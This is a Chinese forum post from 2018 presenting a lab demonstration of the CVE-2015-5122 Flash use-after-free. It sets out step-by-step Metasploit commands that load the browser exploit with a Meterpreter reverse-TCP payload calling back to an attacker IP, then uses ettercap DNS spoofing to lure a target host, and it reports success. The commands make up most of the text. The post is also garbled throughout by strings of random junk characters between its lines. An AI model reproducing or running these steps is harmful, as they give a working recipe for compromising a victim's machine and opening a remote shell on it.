cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

! I7 f2 N0 i- n4 h5 T8 M$ e6 o 二、cve2015-5122漏洞实例演示虚拟机 6 ~" b; g# u0 Q( C

: m; B# @) o0 s9 c 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 3 z" x% {9 h7 ?( }6 k; ]- p1 D

3 a6 |2 n, w: n! k1 ? search cve-2015-5122如图： + C2 W9 y! n- l

- A3 Y+ E9 D+ q; R$ N: n $ X8 ^' H' O8 E, M P+ L

& ~% y2 t( U- G' k& D 下面我们敲如下命令： - i3 K. ^' }+ _2 q" A

$ `+ t9 a5 Q" }, F; W use exploit/multi/browser/adobe_flash_opaque_background_uaf % U' S, a- m; Z- L2 `

% U* ^# h# r0 y! ?8 u; y set PAYLOAD windows/meterpreter/reverse_tcp % g3 @0 N, t! \

" B+ {) _5 x+ v. i0 o set LHOST 192.168.0.109 & ~5 g& G3 O1 ^

; N4 S1 _+ N* b set URIPATH / /*根目录*/ + M/ i; G( q% [9 |- ?+ ~

: Y+ n. q7 ]+ F1 F9 P) U1 e set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 " W$ ^* M \9 E+ l5 }

$ p, u# N" R9 d1 D* y# B% s- ~ set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 3 r: G: ~0 R% N. e$ c; f2 R' C; y8 I

7 a! Z2 K2 }) w. y! p' J 然后show options如图： * E; P# T/ p/ b5 J- `

* m. o; `$ I7 M$ w' d . [% ^) g3 c* I: ?; }

2 r0 R r1 r' g/ I4 ~' u" x 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
) @' a. C- V+ ]; ?) K2 H ! `' N, L& a" J+ s4 C

) }1 _6 O7 K! F+ \- x8 ?2 e8 M! N& |/ m 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 ( `! f3 T& f' z2 b. N8 X

6 ?4 o- W$ ?2 E- _1 [( ^ Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 6 t: s3 C4 h; K/ y( c, n6 e' h

/ T0 S+ Y H# R$ M+ } w: F; x9 q 7 o3 _( V6 x. V- _! T, \

+ X3 s. t# G( }" H1 o7 t 成功了，这时候我们断开ettercap，如图： , X! ^* y( p( B3 b: ?7 a4 Y9 Z/ f6 ~

0 a# H# A2 g: u. E1 k4 K" J 4 l% K! ^- n1 e+ P6 {+ ]

- H; n% N% Z2 L Screenshot如图： 4 a3 i/ m2 q7 W$ K! y

* H! q, H* p% n: s5 j 2 y0 a' N( T" f" a9 n% r/ [

+ X$ \3 j, s8 b" O, E' E c" N1 b; Y5 H " c% a+ t% l: {) y- ~5 S+ l7 i

		自动登录	找回密码
密码			立即注册